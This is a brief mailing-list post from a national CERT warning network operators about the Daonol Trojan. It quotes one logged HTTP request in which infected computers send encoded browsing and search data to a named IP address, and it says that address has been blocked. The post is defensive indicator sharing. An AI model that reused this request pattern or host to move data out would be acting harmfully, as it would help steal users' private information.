Hello NANOG, Yesterday we've found some strange requests in our logs, typical to the Daonol Trojan. According to the logs, the infected computers are sending personal information such as search engine lookups and browsing history. The information sent to 115.100.250.112. Log entry for example: GET http://115.100.250.112/x/?0ECiqocksamkpjqtnwhgrtieydpwgvnmktk2 HTTP/1.0..SS: More information on Daonol Trojan: http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Win32%2fDaonol We've blocked all communication with this address.
Thank you, Hadas Shany CERT.GOV ISRAEL
